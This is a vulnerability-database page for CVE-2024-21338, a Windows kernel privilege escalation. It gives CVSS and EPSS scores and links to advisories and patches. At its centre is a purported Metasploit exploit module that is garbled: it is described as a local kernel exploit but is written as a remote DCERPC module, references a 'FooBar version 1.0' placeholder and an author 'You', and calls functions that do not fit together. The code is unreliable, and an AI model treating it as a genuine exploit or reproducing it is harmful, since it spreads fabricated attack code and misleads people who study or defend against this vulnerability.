Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtE1 Coders1337DAY-ID-39515
HistoryApr 02, 2024 - 12:00 a.m.

Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Exploit

2024-04-0200:00:00
E1 Coders
0day.today
65
microsoft windows 10
kernel privilege escalation
exploit
cve-2024-21338
remote code execution
vulnerability
vulnerability exploit

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

7

Confidence

Low

EPSS

0.014

Percentile

86.6%

JSON
#############################################
# Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################

 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )
 
    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end
 
  def check
    connect
 
    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end
 
    Exploit::CheckCode::Appears
  end
 
  def exploit
    connect
 
    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end
 
    handler
    disconnect
  end
end
 
 
#refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338

Related

githubexploit 6
nvd 1
cvelist 1
vulnrichment 1
packetstorm 1
cisa_kev 1
thn 4
prion 1
mscve 1
attackerkb 1
exploitdb 1
cve 1
qualysblog 1
avleonov 1
mskb 6
openvas 4
nessus 6
kaspersky 1
rapid7blog 1
githubexploit
githubexploit
Exploit for Untrusted Pointer Dereference in Microsoft
2024-04-23 19:09:22
Exploit for Untrusted Pointer Dereference in Microsoft
2024-06-23 06:03:44
Exploit for Untrusted Pointer Dereference in Microsoft
2024-04-13 05:53:02
nvd
nvd
CVE-2024-21338
2024-02-13 18:15:49
cvelist
cvelist
CVE-2024-21338 Windows Kernel Elevation of Privilege Vulnerability
2024-02-13 18:02:09
vulnrichment
vulnrichment
CVE-2024-21338 Windows Kernel Elevation of Privilege Vulnerability
2024-02-13 18:02:09
packetstorm
packetstorm
Microsoft Windows 10.0.17763.5458 Privilege Escalation
2024-04-02 00:00:00
cisa_kev
cisa_kev
Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability
2024-03-04 00:00:00
thn
thn
Lazarus Hackers Exploited Windows Kernel Flaw as Zero-Day in Recent Attacks
2024-02-29 11:19:00
North Korea's Lazarus Group Deploys New Kaolin RAT via Fake Job Lures
2024-04-25 16:47:00
Microsoft Patches Zero-Day Flaw Exploited by North Korea's Lazarus Group
2024-08-19 07:05:00
prion
prion
Privilege escalation
2024-02-13 18:15:00
mscve
mscve
Windows Kernel Elevation of Privilege Vulnerability
2024-02-13 08:00:00
attackerkb
attackerkb
CVE-2024-21338
2024-02-13 00:00:00
exploitdb
exploitdb
Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
2024-04-02 00:00:00
cve
cve
CVE-2024-21338
2024-02-13 18:15:49
qualysblog
qualysblog
Microsoft and Adobe Patch Tuesday, February 2024 Security Update Review
2024-02-13 20:03:29
avleonov
avleonov
February 2024: Vulremi, Vuldetta, PT VM Course relaunch, PT TrendVulns digests, Ivanti, Fortinet, MSPT, Linux PW
2024-03-05 18:43:32
mskb
mskb
February 13, 2024—KB5034763 (OS Builds 19044.4046 and 19045.4046)
2024-02-13 08:00:00
February 13, 2024—KB5034768 (OS Build 17763.5458)
2024-02-13 08:00:00
February 13, 2024—KB5034765 (OS Builds 22621.3155 and 22631.3155)
2024-02-13 08:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB5034763)
2024-02-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB5034768)
2024-02-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB5034766)
2024-02-14 00:00:00
nessus
nessus
KB5034768: Windows 10 version 1809 / Windows Server 2019 Security Update (February 2024)
2024-02-13 00:00:00
KB5034763: Windows 10 Version 21H2 / Windows 10 Version 22H2 Security Update (February 2024)
2024-02-13 00:00:00
KB5034770: Windows Server 2022 / Azure Stack HCI 22H2 Security Update (February 2024)
2024-02-13 00:00:00
kaspersky
kaspersky
KLA63958 Multiple vulnerabilities in Microsoft Windows
2024-02-13 00:00:00
rapid7blog
rapid7blog
Patch Tuesday - February 2024
2024-02-13 21:26:21

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

7

Confidence

Low

EPSS

0.014

Percentile

86.6%

JSON
Related for 1337DAY-ID-39515
githubexploit6nvd1cvelist1vulnrichment1packetstorm1cisa_kev1thn4prion1mscve1attackerkb1exploitdb1cve1qualysblog1avleonov1mskb6openvas4nessus6kaspersky1rapid7blog1